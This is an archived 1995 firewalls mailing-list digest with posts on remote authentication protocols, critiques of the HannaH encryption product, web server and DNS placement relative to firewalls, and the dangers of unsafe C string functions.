Subject: Re: Use of Remote Authentication: tacacs/radius/etc...
In-Reply-To: <199508312303.QAA06065@miles.greatcircle.com>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
content-length: 412
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

David wrote:
> In addition to TACACS and RADIUS, there is now TACACS+. You'll need to be
> running IOS 10.3(3) or later to get this. TACACS+ is a complete rewrite of
> TACACS. It is a big step ahead of both TACACS and RADIUS. (Yes, I am
> biased.)

So why is Cisco starting to use Radius? (Packet magazine, Vol. 7, Number 2, Second Quarter 1995, p. 13)

Marcelo L. Rodrigues
mlrodrig@larc.usp.br

From firewalls-owner Fri Sep 1 12:32:40 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA11305 for firewalls-outgoing; Fri, 1 Sep 1995 12:09:51 -0700
Received: from incog.com (ns.incog.com [199.190.177.251]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA11297; Fri, 1 Sep 1995 12:09:48 -0700
From: mulligan@future.incog.com
Received: from coslabs.incog.com by incog.com (SMI-8.6/94082501) id MAA26332; Fri, 1 Sep 1995 12:07:41 -0700
Received: from future.incog.com by coslabs.incog.com (5.x/SMI-SVR4) id AA08590; Fri, 1 Sep 1995 13:07:49 -0600
Received: from future (localhost) by future.incog.com (5.x/SMI-SVR4) id AA07943; Fri, 1 Sep 1995 13:07:47 -0600
Message-Id: <9509011907.AA07943@future.incog.com>
To: gary flynn
Cc: mulligan@incog.com, adm_lcorea@vax1.acs.jmu.edu, firewalls-owner@GreatCircle.COM, firewalls@GreatCircle.COM, foxtrot@sware.com, isdmill@gatekeeper.ddp.state.me.us, oit_cathy@vax1.acs.jmu.edu, oit_charles@vax1.acs.jmu.edu, oit_dbh@vax1.acs.jmu.edu, shan.bell@sware.com
Subject: Re: HannaH from SecureWare Inc.
Reply-To: mulligan@incog.com
In-Reply-To: Your message of "Fri, 01 Sep 1995 14:44:37 EDT." <199509011852.LAA25720@incog.com>
Date: Fri, 01 Sep 1995 13:07:47 -0600
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Gary wrote:
> The Hannah documents indicate that the management workstation and
> certificate authority are two different machines.

Actually it says that the CA and management GUI are separate applications, and it just so happens that today you must run the CA on Windows95 and the management GUI on HPUX or SCO.

> Do products exist? Where can I find more information on these?

SKIP for Solaris (which won't do you much good if you are running Windows) is freely available now, and documentation of SKIP is available at http://skip.incog.com. You would need to check out the ipsec list to find out about other alternatives.
geoff

From firewalls-owner Fri Sep 1 12:50:18 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA09894 for firewalls-outgoing; Fri, 1 Sep 1995 11:44:01 -0700
Received: from incog.com (ns.incog.com [199.190.177.251]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA09880 for ; Fri, 1 Sep 1995 11:43:57 -0700
From: mulligan@future.incog.com
Received: from coslabs.incog.com by incog.com (SMI-8.6/94082501) id LAA25284; Fri, 1 Sep 1995 11:42:17 -0700
Received: from future.incog.com by coslabs.incog.com (5.x/SMI-SVR4) id AA08418; Fri, 1 Sep 1995 12:42:20 -0600
Received: from future (localhost) by future.incog.com (5.x/SMI-SVR4) id AA07846; Fri, 1 Sep 1995 12:42:20 -0600
Message-Id: <9509011842.AA07846@future.incog.com>
To: gary flynn
Cc: mulligan@incog.com, firewalls-digest@GreatCircle.COM, shields@yage.tembel.org
Subject: Re: HannaH from SecureWare Inc.
Reply-To: mulligan@incog.com
In-Reply-To: Your message of "Fri, 01 Sep 1995 14:08:47 EDT." <199509011816.LAA24628@incog.com>
Date: Fri, 01 Sep 1995 12:42:20 -0600
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Gary wrote:
> True, it has some limitations. Some will be solved, some may not. But
> for our users of mainline applications, it seems to cover the bases
> pretty well.

So for you, in your specific environment, it may be an OK solution. There have been a number of concerns raised, though.

> The bulk of our machines are PCs. I probably should have made that
> clear.

Again, for your environment it may work, but what about the other systems that your PC users may want to communicate with securely? You need interoperability.

>
> > The "certificate diskette" is yet another potential problem. Since the
> > private key is decrypted off the disk and stored in the end system it is
> > available to be read by anything running on system (especially on PCs)
> > and when the diskette is removed does the private key get removed or
> > does the system maintain its identity/Distinguished Name. It can't check
> > for the presence of the diskette on every packet or it would be too slow
> > to be usable. In addition the private key (though encrypted) on the
> > certificate diskette is copyable.
> >
>
> I'd put this in the class of "please remember to logoff the system
> when you are done and before leaving your terminal/PC". The user
> needs to "unsecure" the desktop before leaving. This may imply
> turning it off or Hannah may have some procedure to "unauthenticate".
> The diskette is a threat but physical security addresses that.

No, the threat is also that if I can copy your diskette and guess or brute force your password (users always use good passwords) or I can grab the decrypted private key from the PC itself, then I can become you. Obviously if you think that it meets your needs (as you seem to) then use it.

geoff

From firewalls-owner Fri Sep 1 13:00:43 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA11548 for firewalls-outgoing; Fri, 1 Sep 1995 12:14:03 -0700
Received: from eros.britain.eu.net (eros.Britain.EU.net [192.91.199.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA11538 for ; Fri, 1 Sep 1995 12:13:58 -0700
Received: from airtechsms.co.uk by eros.britain.eu.net with UUCP id ; Fri, 1 Sep 1995 19:57:00 +0100
Received: by airtechsms.co.uk (Smail3.1.28.1 #1) id m0soRBf-00000jC; Fri, 1 Sep 95 09:10 BST
Date: Fri, 1 Sep 1995 09:10:54 +0100 (BST)
From: Martin Hepworth
X-Sender: max@airtechs
To: Alex Sharpe
cc: "'firewalls-owner'"
Subject: Re: Placement of WWW Server - any thoughts?
In-Reply-To: <3044F9DE@bass.rssi.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Wed, 30 Aug 1995, Alex Sharpe wrote:
>
> We are installing a Web Server that we want to give the world access to, but
> are not sure of our security architecture yet. We are kicking around
> several ideas including the idea of only allowing HTTP to pass through our
> FIREWALL if it is destined for the Web server. We are considering doing
> this by filtering on the Web Server's IP address and HTTP port number.
>
> What do you think? What are the residual risks?
>
> Alex.Sharpe@rssi.com
>

The 'normal' and most secure place to put your W3 server is in the DMZ; that way no HTTP stuff comes into your network, unless you've someone on the inside surfing. That's also the best? place to put any ftp server -- if it doesn't need to be on your side of the firewall don't put it there!

MGH
------------------------------------------------------------------
Martin Hepworth,            email work: max@airtechsms.co.uk
Racal-Airtech, UK           email home: mgh@cityscape.co.uk
Voice: +44(0)1844 201800    http://www.gold.net/users/ef67/
FAX:   +44(0)1844 201832    PGP Key on request
All opinions are mine, mine, all mine................
From firewalls-owner Fri Sep 1 13:09:03 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA10349 for firewalls-outgoing; Fri, 1 Sep 1995 11:54:13 -0700
Received: from habanero.jmu.edu (habanero.jmu.edu [134.126.70.210]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA10342; Fri, 1 Sep 1995 11:54:08 -0700
Message-Id: <199509011854.LAA10342@miles.greatcircle.com>
Received: by habanero.jmu.edu (1.37.109.16/16.2) id AA012271077; Fri, 1 Sep 1995 14:44:37 -0400
Date: Fri, 1 Sep 1995 14:44:37 -0400
From: gary flynn
To: mulligan@incog.com
Subject: Re: HannaH from SecureWare Inc.
Cc: adm_lcorea@vax1.acs.jmu.edu, firewalls-owner@GreatCircle.COM, firewalls@GreatCircle.COM, foxtrot@sware.com, isdmill@gatekeeper.ddp.state.me.us, oit_cathy@vax1.acs.jmu.edu, oit_charles@vax1.acs.jmu.edu, oit_dbh@vax1.acs.jmu.edu, shan.bell@sware.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> From mulligan@future.incog.com Fri Sep 1 14:23 EDT 1995
> Gary wrote:
> > Hannah is centrally administered although you have to install the
> > product on all the platforms. So there is a central security
> > administrator. Software distribution, installation, and configuration
> > management mechanisms and policies need to exist for network/node
> > management anyway, so the addition of one more product shouldn't
> > negate the overall concept.
>
> Oh and this points to another potential problem, they have combined the
> administrative system with the Certification Authority. This is very
> very bad. The CA is the box that holds the very sensitive CA private
> key and having this box on the network just begs to have that key
> compromised - then anyone and everyone can sign certificates saying
> they are anyone. All security is lost, the war is lost, the count is 10
> and you're out.
>
The Hannah documents indicate that the management workstation and certificate authority are two different machines.

> Key management/negotiation overhead is another very critical issue.
> Their document doesn't mention the protocol used to do this negotiation.
> What about support for different encryption mechanisms.
>
> In addition I haven't heard anything about the actual protocols. They
> certainly aren't open and publicly available. What about
> interoperability with other systems. They don't seem to be talking
> with any standards groups.
>
> On the other hand there are systems being developed and available that
> provide much the same functionality (end to end encryption and
> authentication) without some of the drawbacks (key management overhead,
> lack of support to multiple encryption techniques, private/closed
> proprietary protocol, lack of multi-protocol support) such as SKIP and
> others being worked on in the IPSEC working group.
>
Do products exist? Where can I find more information on these?

thanks,
gary

From firewalls-owner Fri Sep 1 13:30:13 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA15706 for firewalls-outgoing; Fri, 1 Sep 1995 13:04:57 -0700
Received: from aspensys (aspensys.aspensys.com [198.77.70.104]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA15693 for ; Fri, 1 Sep 1995 13:04:53 -0700
Received: from smtpinet.aspensys.com by aspensys (5.0/SMI-SVR4) id AA21750; Fri, 1 Sep 1995 16:00:01 +0500
Received: from cc:Mail by smtpinet.aspensys.com id AA809996857 Fri, 01 Sep 95 16:07:37 EST
Date: Fri, 01 Sep 95 16:07:37 EST
From: jmeritt@smtpinet.aspensys.com (Meritt, Jim)
Message-Id: <9508018099.AA809996857@smtpinet.aspensys.com>
Cc: firewalls@greatcircle.com
Subject: how to close socket
content-length: 147
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On a standard Sun box using /etc/services and inetd, how would you stop traffic from being passed through a port?
Jim Meritt

From firewalls-owner Fri Sep 1 13:36:51 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA17446 for firewalls-outgoing; Fri, 1 Sep 1995 13:19:52 -0700
Received: from emory.mathcs.emory.edu (emory.mathcs.emory.edu [128.140.2.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id NAA17427 for ; Fri, 1 Sep 1995 13:19:47 -0700
Received: from wittsend.UUCP by emory.mathcs.emory.edu (5.65/Emory_mathcs.4.0.16) via UUCP id AA06995 ; Fri, 1 Sep 95 16:18:23 -0400
Received: by wittsend (/\==/\ Smail3.1.28.1 #28.1) for id ; Fri, 1 Sep 95 15:54 EDT
Message-Id:
Subject: Re: HannaH from SecureWare Inc.
To: firewalls@greatcircle.com
Date: Fri, 1 Sep 1995 15:54:00 -0400 (EDT)
From: "Michael H. Warfield"
In-Reply-To: <9509011907.AA07943@future.incog.com> from "mulligan@future.incog.com" at Sep 1, 95 01:07:47 pm
X-Mailer: ELM [version 2.4 PL20]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 1205
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

mulligan@future.incog.com enscribed thusly:
> Gary wrote:
> > The Hannah documents indicate that the management workstation and
> > certificate authority are two different machines.
> Actually it says that the CA and management gui are separate
> applications and it just so happens that today you must run the CA on
> Windows95 and the management gui on HPUX or SCO.

WHAT?!?!?! The CA must run on Windows 95!?!?! Well, there goes any chance of any security whatsoever! Somebody must be absolutely dreaming to place any security product on Windows 95. I MIGHT accept Windows NT. At least that does have security features, even if they are untried and have not yet stood the test of time. To place a critical piece of security code on Windows 95, an alleged operating system riddled with bugs by Microsoft's own admission, is sheer insanity! My interest in this product is now total history!

> geoff

--
Michael H. Warfield  |  (770) 985-6132  |  mhw@WittsEnd.com
(The Mad Wizard)     |  (770) 925-8248  |  http://www.wittsend.com/mhw/
NIC whois: MHW9      |  An optimist believes we live in the best of all
PGP Key: 0xDF1DD471  |  possible worlds.  A pessimist is sure of it!

From firewalls-owner Fri Sep 1 16:00:11 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA24288 for firewalls-outgoing; Fri, 1 Sep 1995 15:43:04 -0700
Received: from colin.muc.de (colin.muc.de [193.174.4.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id PAA24281 for ; Fri, 1 Sep 1995 15:43:00 -0700
Received: by colin.muc.de via suspension id <41450-2>; Sat, 2 Sep 1995 00:41:12 +0200
Received: from en by colin.muc.de with UUCP id <41447-2>; Fri, 1 Sep 1995 23:33:53 +0200
Received: by en.muc.de (Sendmail5.67a8/IDA-1.5) id AA00587; Fri, 1 Sep 1995 09:50:24 +0200
Date: Fri, 1 Sep 1995 09:50:24 +0200
From: "Ralf S. Engelschall"
Message-Id: <199509010750.AA00587@en.muc.de>
To: firewalls@greatcircle.com
Subject: Re: DNS forwarding problem
Newsgroups: sdm.lists.firewalls
Organization: Engelschall (EN) Privat, Dachau/Munich, Germany
Reply-To: rse@en.muc.de
X-Newsreader: TIN [version 1.2 PL2]
X-Charset: ASCII
X-Char-Esc: 29
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On 31 Aug 1995 01:16:55 +0200 in sdm.lists.firewalls you wrote:
> [...]
> You then configure all your clients INCLUDING THE BASTION/GATEWAY to resolve
> using the internal nameserver.
> [...]
> The really weird part is that when the bastion/gateway wants to resolve an
> internet name, it asks the internal, which forwards back to the bastion/gateway
> which does the resolution and sends the answer back along the same path.

I cannot understand WHY the bastion has to resolve via the internal nameserver. I run my bastion host via a /etc/resolv.conf which points to its local nameserver. And this works fine. The bastion only needs to resolve the name of the internal bastion, and this name is in its DNS.
Are there any _REAL_ security concerns about resolving the outer bastion host NOT via the internal bastion host?

Ralf S. Engelschall
rse@en.muc.de
http://www.muc.de/~rse

From firewalls-owner Fri Sep 1 17:02:41 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA26994 for firewalls-outgoing; Fri, 1 Sep 1995 16:58:26 -0700
Received: from rudolph.cs.utk.edu (RUDOLPH.CS.UTK.EDU [128.169.92.87]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA26964 for ; Fri, 1 Sep 1995 16:58:20 -0700
Received: from LOCALHOST.cs.utk.edu by rudolph.cs.utk.edu with SMTP (cf v2.11c-UTK) id TAA11927; Fri, 1 Sep 1995 19:56:55 -0400
Message-Id: <199509012356.TAA11927@rudolph.cs.utk.edu>
To: firewalls@greatcircle.com
Subject: linux vs. *bsd for secure networking system
Date: Fri, 01 Sep 1995 19:56:54 -0400
From: Paul McMahan
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hello,

I know that the linux vs. (free|net)bsd question is the subject of ongoing debates outside the realm of firewalls, but I'm interested specifically in the security aspects of these operating systems. I'm debating about which OS to use on a firewall machine and I need to know specifics about which OS is a better platform for effective security. Please advise.
Paul McMahan

From firewalls-owner Fri Sep 1 17:09:06 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA26176 for firewalls-outgoing; Fri, 1 Sep 1995 16:42:32 -0700
Received: from tera.bctel.net (tera.bctel.net [204.174.66.253]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA26163 for ; Fri, 1 Sep 1995 16:42:27 -0700
Received: (from nobody@localhost) by tera.bctel.net (8.6.10/8.6.10) id QAA26096; Fri, 1 Sep 1995 16:40:28 -0700
Received: from mocha.bctel.net(204.174.66.5) by tera via smap (V1.3) id sma026094; Fri Sep 1 16:40:01 1995
Received: (from murrell@localhost) by mocha.bctel.net (8.6.10/8.6.10) id QAA18381; Fri, 1 Sep 1995 16:37:36 -0700
Date: Fri, 1 Sep 1995 16:37:36 -0700
From: Brian Murrell
Message-Id: <199509012337.QAA18381@mocha.bctel.net>
To: firewalls@GreatCircle.COM, rse@en.muc.de
Subject: Re: DNS forwarding problem
X-Sun-Charset: US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> I cannot understand WHY the bastion has to resolve via the internal
> nameserver. I run my bastion host via a /etc/resolv.conf which points to its
> local nameserver. And this works fine. The bastion only needs to resolve the
> name of the internal bastion and this name is in his DNS.

Because typically people who run split DNS do so to hide the internal namespace from the world. Thusly only machines which query the internal DNS (typically internal machines and NOT external machines) can see the internal hosts. By telling the bastion to resolve using the internal nameserver, it sees both the inside world and outside world. It should, as it (and only it) lives in both worlds.

b.
--
Brian J. Murrell                  murrell@bctel.net
BCTel Advanced Communications     brian@ilinx.com
Vancouver, B.C.                   brian@wimsey.com
604 454 5262

From firewalls-owner Fri Sep 1 19:02:42 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA29937 for firewalls-outgoing; Fri, 1 Sep 1995 19:01:27 -0700
Received: from switchblade.iwi.com (switchblade.iwi.com [137.39.156.214]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id TAA29930 for ; Fri, 1 Sep 1995 19:01:23 -0700
Received: (from mjr@localhost) by switchblade.iwi.com (8.6.9/8.6.9) id WAA14456 for Firewalls@GreatCircle.COM; Fri, 1 Sep 1995 22:17:54 -0400
From: "Marcus J. Ranum"
Message-Id: <199509020217.WAA14456@switchblade.iwi.com>
Subject: snprintf()
To: Firewalls@GreatCircle.COM
Date: Fri, 1 Sep 1995 22:17:54 -0400 (EDT)
Reply-To: mjr@iwi.com
Organization: Information Warehouse! Inc, Baltimore, MD
URL: mjr's web page
Phone: 410-889-8569
Coredump: Infocalypse Now!!!
X-Mailer: ELM [version 2.4 PL24]
Content-Type: text
Content-Length: 3100
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Patrick Powell writes:
>If you want to launch a crusade, then start with the C language programming
>books. Eradicate their use of sprintf, sscanf, gets, and other IO functions
>that are inherently flawed.

If you want to start a crusade, ask rather why people are writing mission critical software in a programming language that is not type or allocation safe, which has virtually no runtime controls, and which requires programmers to manually maintain memory allocation. That's like doing dentistry with a crowbar: you can do it, but it's a sloppy, and somewhat risky tool for spots where you need a delicate touch.

The unfortunate fact is that if you want to develop something (like the fwtk) that people can use on common platforms, then it's not likely to be well-received if you write it in a safe programming language like Modula-3 or something that would probably produce more robust executables. So C is the language of choice - but let's not kid ourselves that it's the right language.
It's the *available* language. For example (believe it or not!) I saberized the toolkit thoroughly, and V1.0 was completely run for quite a while on my Sparc, under the interpreter checking for runtime errors. *BUT* of course you never find them all because some parts of the system don't get stressed enough and even saber-C doesn't check the internals of library routines like syslog().

The formalists[*] hold a particularly rigorous view of the problem. Namely: you should be able to build components on top of other components you trust, which run on an O/S you trust and then we would not have these kinds of little problems. But: who will step forward and do a complete design review of stdio? [Chris, don't answer that!] and who will check Chris' implementation? And who will make sure the vendors all adopt it? And *THEN* there's all the other code and dbm and resolv and -- the list goes on. Who will do the security code review of X11R6? What about MOTIF? I will stop there because I just ate.

In the short term, there are some measures we can take but they're draconian. One *could* simply take sprintf() et al out of libc -- that's what shared libraries are for! Or you can replace the program with something that does the right thing. It is instructive to replace system() on your machine with a library routine that calls abort() if it detects that it is running as euid < 100.

BSDI machines do this cute thing:

    . cat > x.c
    main() { gets(0); }
    . make x
    cc -O2 x.c -o x
    . x
    warning: this program uses gets(), which is unsafe.
    ^C
    .

The gets() library routine has been programmed to HUMILIATE itself when you use it! If one's sprintf() did the same thing, it would get fixed pretty quickly as users tired of seeing that crud on their screen.

mjr.

[*The formalists are an obscure religious sect that is on the verge of extinction, whose surviving members are mostly in hiding protecting the One Perfect Program, which happens to be a provably correct version of "hello.c" - if you assume the compiler's code generator and optimizer work right.]

From firewalls-owner Fri Sep 1 19:32:42 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA00686 for firewalls-outgoing; Fri, 1 Sep 1995 19:29:16 -0700
Received: from relay1.UU.NET (relay1.UU.NET [192.48.96.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id TAA00672 for ; Fri, 1 Sep 1995 19:29:12 -0700
Received: from montgomery.com by relay1.UU.NET with SMTP id QQzfjt14693; Fri, 1 Sep 1995 22:27:56 -0400
Message-ID:
Date: 1 Sep 1995 19:24:39 -0800
From: "Kenneth Kron"
Subject: snprintf.c and SunOS 5.4
To: firewalls@GreatCircle.COM, "Patrick Powell"
X-Mailer: Mail*Link SMTP-MS 3.0.1
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Patrick,

Thanks for the snprintf source. FYI -- in order to compile your snprintf on SunOS 5.4 I had to #include

For anyone else doing this you can either define HAVE_STDARG_H or HAVE_VARARGS_H; both work under SunOS 5.x. Of course stdarg.h provides more type checking.

Kenneth Kron
INS Network Security Consultant
kkron@montgomery.com

From firewalls-owner Sat Sep 2 07:30:05 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA09565 for firewalls-outgoing; Sat, 2 Sep 1995 07:16:47 -0700
Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA09558 for ; Sat, 2 Sep 1995 07:16:43 -0700
Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA16782; Sat, 2 Sep 95 09:49:25 -0400
Date: Sat, 2 Sep 95 09:49:24 -0400
Message-Id: <9509021349.AA16782@uvs1.orl.mmc.com>
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E.
Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: re: snprintf(), SMURF, & Jules Own Version... Sender: firewalls-owner@GreatCircle.COM Precedence: bulk mjr rites (Hi Marcus 8*): > If you want to start a crusade, ask rather why people are >writing mission critical software in a programming language that >is not type or allocation safe, which has virtually no runtime >controls, and which requires programmers to manually maintain >memory allocation. Naah, fact is that if companies advertise for C++ programmers, they are not going to get people who understand bounds checking like us Mil-Std-1815 weenies (see: the DoD does have a sense of humour 8*). > The formalists[*] hold a particularly rigorous view of >the problem. Namely: you should be able to build components >on top of other components you trust, which run on an O/S >you trust and then we would not have these kinds of little problems. And then there are those assembly & machine code programmers who do not trust anything they did not write themselves (heck the BIOS on the first IBM PC-ATs did not even meet IBM's own spec and that was less than 64k). >[*The formalists are an obscure religious sect that is on the >verge of exctinction, whose surviving members are mostly in hiding >protecting the One Perfect Program, which happens to be a provably >correct version of "hello.c" - if you assume the compiler's code >generator and optimizer work right.] No assumptions permitted: back in the days of MacDac vs SoftTech when compiler mfrs had real *marketeers* (and hospitality suites at shows 8*) and Mil-Std-1750A was a coprocessor in search of a processor we used to do code checks v/v the same thing in pure assembly. Compilers were actually validated and the source was available (if you had the right contacts at the LCF). 
Disassemblers were something written in an afternoon (have a printout here somewhere of the 680x program used by the first GM car computers - Delco claimed it was "proprietary" despite being in a million cars). Of course considering what we were paid for, it was "rocket science". Besides a *real* programmer wouldn't bother with hello.c, he/she/it/other would have written a VAX device driver to intercept every print banner, bump up the priority, and insert a picture of Crusader Rabbit *that worked* (maybe 20% of the people who took the VAX "Device Drivers" course could actually write one by the end of the week). Of course now I spend my time trying to figure out why group ID assignments do not work properly when passed to an access server in IOS 10.3 (& creating Rags the Tiger banners that also send an alarm to the admin pager on strobes to port 79 of the router 8*). (ob firewalls) Warmly, Padgett From firewalls-owner Sat Sep 2 09:00:03 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA10941 for firewalls-outgoing; Sat, 2 Sep 1995 08:44:22 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA10934 for ; Sat, 2 Sep 1995 08:44:16 -0700 From: cjolley@iac.net Received: from UVS1.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA16981; Sat, 2 Sep 95 11:42:52 -0400 Date: Sat, 2 Sep 95 11:42:52 -0400 Message-Id: <9509021542.AA16981@uvs1.orl.mmc.com> To: padgett@tccslr.dnet.mmc.com Cc: "firewalls@greatcircle.com"@uvs1.dnet.mmc.com Subject: re: snprintf(), SMURF, & Jules Own Version... 
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Another group of programmers who spend no time doing bounds checking or worrying about allocation and deallocation of memory are those who write code for an environment where the hardware enforces bounds checking and the operating system handles all the details regarding allocation and deallocation of _all_ system resources. And, since that environment doesn't have (and doesn't need) an assembly language, even the highly skilled system programmers can't code detours around such features.

**** cjolley@iac.net
**** All opinions are my own and not necessarily those of my employer
****

On Sat, 2 Sep 1995 padgett@tccslr.dnet.mmc.com wrote:
> mjr rites (Hi Marcus 8*):
> > If you want to start a crusade, ask rather why people are
> > writing mission critical software in a programming language that
> > is not type or allocation safe, which has virtually no runtime
> > controls, and which requires programmers to manually maintain
> > memory allocation.
>
> Naah, fact is that if companies advertise for C++ programmers, they are not
> going to get people who understand bounds checking like us Mil-Std-1815
> weenies (see: the DoD does have a sense of humour 8*).
>
> > The formalists[*] hold a particularly rigorous view of
> > the problem. Namely: you should be able to build components
> > on top of other components you trust, which run on an O/S
> > you trust and then we would not have these kinds of little problems.
>
> And then there are those assembly & machine code programmers who do not
> trust anything they did not write themselves (heck the BIOS on the first
> IBM PC-ATs did not even meet IBM's own spec and that was less than 64k).
>
> > [*The formalists are an obscure religious sect that is on the
> > verge of extinction, whose surviving members are mostly in hiding
> > protecting the One Perfect Program, which happens to be a provably
> > correct version of "hello.c" - if you assume the compiler's code
> > generator and optimizer work right.]
>
> No assumptions permitted: back in the days of MacDac vs SoftTech when
> compiler mfrs had real *marketeers* (and hospitality suites at shows 8*)
> and Mil-Std-1750A was a coprocessor in search of a processor we used to do
> code checks v/v the same thing in pure assembly. Compilers were actually
> validated and the source was available (if you had the right contacts at
> the LCF). Disassemblers were something written in an afternoon (have a
> printout here somewhere of the 680x program used by the first GM car
> computers - Delco claimed it was "proprietary" despite being in a million
> cars). Of course considering what we were paid for, it was "rocket science".
>
> Besides a *real* programmer wouldn't bother with hello.c, he/she/it/other
> would have written a VAX device driver to intercept every print banner,
> bump up the priority, and insert a picture of Crusader Rabbit *that worked*
> (maybe 20% of the people who took the VAX "Device Drivers" course could
> actually write one by the end of the week).
>
> Of course now I spend my time trying to figure out why group ID assignments
> do not work properly when passed to an access server in IOS 10.3 (& creating
> Rags the Tiger banners that also send an alarm to the admin pager on strobes
> to port 79 of the router 8*). (ob firewalls)
>
> Warmly,
> Padgett
>

From firewalls-owner Sat Sep 2 10:00:03 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA11763 for firewalls-outgoing; Sat, 2 Sep 1995 09:40:25 -0700
Received: from roble.com (roble.com [204.188.93.50]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA11756 for ; Sat, 2 Sep 1995 09:40:22 -0700
Received: by roble.com (4.1/SMI-4.1/roble) id AA10160; Sat, 2 Sep 95 09:38:59 PDT
Date: Sat, 2 Sep 1995 09:17:59 -0700 (PDT)
From: Roger Marquis
Subject: Subject: Re: using suns/sunos for gateway host(s)
To: Firewalls@GreatCircle.COM
In-Reply-To: <199508301706.KAA28357@miles.greatcircle.com>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> According to ~The Firewall Book~, things like IP forwarding and IP source
> routing should be disabled on gateway hosts used to construct a firewall.
>
> I called sun tech support, and not surprisingly they didn't have a clue how to
> modify the 4.1.3 kernel to achieve this.

It's unlikely you spoke with Sun tech support. You probably spoke with an operator. If you had spoken with an engineer they would have given you a service order number. Any Sun engineer could tell you how to disable ip-forwarding; they all have access to Sunsolve.

> If anyone could give me some pointers, I'd appreciate it.

If you have a Sun support contract, or a Sunsolve CD, search for ip_forwarding. I found detailed procedures for 4.0, 4.1, and 5.x. You might also check out the "Practical Guide to Solaris Security". It has a number of recommendations you won't find in Bellovin and Cheswick's book. Also, check out ftp://ftp.nec.com/pub/security, ftp://info.cert.org, and ftp://sunsite.unc.edu for more info on SunOS firewalls and utilities like tripwire, tcp_wrappers, npasswd, and cops.
Roger Marquis

From firewalls-owner Sat Sep 2 11:00:03 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA13006 for firewalls-outgoing; Sat, 2 Sep 1995 10:39:26 -0700
Received: from wintermute.imsi.com (wintermute.imsi.com [192.103.3.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA12999 for ; Sat, 2 Sep 1995 10:39:23 -0700
Received: from relay.imsi.com by wintermute.imsi.com id NAA23728 for ; Sat, 2 Sep 1995 13:38:01 -0400
Received: from lorax.imsi.com by relay.imsi.com id NAA27224 for ; Sat, 2 Sep 1995 13:38:00 -0400
Received: from localhost by lorax.imsi.com (4.1/SMI-4.1) id AA07170; Sat, 2 Sep 95 13:37:59 EDT
Resent-Message-Id: <9509021737.AA07170@lorax.imsi.com>
Message-Id: <9509021737.AA07170@lorax.imsi.com>
To: Ted Stockwell , shields@tembel.org (Michael Shields)
Cc: firewalls@greatcircle.com
Subject: Re: FW: Programming
Reply-To: rens@imsi.com
Date: Sat, 02 Sep 1995 13:17:15 -0400
From: Rens Troost
Resent-To: firewalls@greatcircle.com
Resent-Date: Sat, 02 Sep 1995 13:37:59 -0400
Resent-From: Rens Troost
